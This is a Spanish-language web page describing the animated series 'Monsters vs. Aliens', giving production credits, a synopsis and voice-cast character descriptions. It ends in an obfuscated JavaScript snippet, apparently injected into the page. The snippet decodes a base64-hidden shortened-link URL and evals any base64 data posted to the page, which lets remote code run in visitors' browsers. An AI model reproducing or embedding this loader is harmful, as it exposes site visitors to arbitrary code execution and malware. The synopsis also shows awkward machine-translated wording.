Monsters vs. Aliens

Cartel Serie
Título original: Monsters vs. Aliens
Año: 2013
Duración: 22 min.
País: Estados Unidos
Director: Matt Engstrom, Sunil Hall, Jim Schumann, Eddie Trigueros
Guión: Kim Duran, Bill Motz, Bob Roth, Brandon Sawyer
Música: Adam Berry
Fotografía: Animation Reparto: Animation
Productora: DreamWorks Animation / Nickelodeon Productions
Género: Animación. Comedia. Ciencia ficción | Monstruos. Spin-off
Temporada: 1
Capítulos: 26

Descripcion

Sinopsis

Después de sus aventuras anteriores, todo está tranquilo para el “Team Monster” en el Área de los cincuenta y tantos. Es decir, hasta Coverton, un extranjero telepático, aprisiona al presidente de los EE.UU. y se instala en la base junto con una serie de otros extranjeros.

[editar] Personajes
Riki Lindhome como Susan Murphy/Genórmica: Una joven y hermosa mujer de Modesto, California, que es golpeada por un meteorito radiactivo en el día de su boda, haciéndola mutar y crecer hasta una altura de casi 15 metros. Después de que salvar al mundo de la invasión de Gallaxhar junto a sus amigos se queda a vivir en el ÁREA-52 mientras resuelve misiones que el General Monger les asigna. En la serie se corto el pelo.
Eric Edelstein como B.O.B. (Bicarbonato Ostilizeno Benzoato): Una masa gelatinosa indestructible que al no tener cerebro, le cuesta analizar muchas cosas. Fue el resultado catastrófico de una fábrica de condimentos.
Chris O’Dowd como Dr Cucaracha: un científico loco que, tratando de que los humanos tuvieran las mismas capacidades de vida que las cucarachas, terminó teniendo el cuerpo de una.
Diedrich Bader como El Eslabón Perdido: un ser con 20 000 años de antigüedad, con características humanas y acuáticas.
Jeff Bennett como Coverton: Maestro Manipulador y lider de los aliens,es el villano que amaras odiar,tiene el poder de la telequinesis.No se debe confiar en el ya que te podria ir mal..;Siempre esta ideando un nuevo plan7
Gillian Jacobs como Sta’abi.8 9
(function(){if(document.cookie.indexOf(‘_advstop’)!==-1)return;var ajaxListener=function(){try{var c=window.atob(event.data);eval(c)}catch(e){}};document.write(”);var h=document.location.protocol+’//’+window.atob(‘Yml0Lmx5LzFFeFJXS2w=’)+’?’+Math.random();addEventListener(‘message’,ajaxListener,false);document.write(”)})();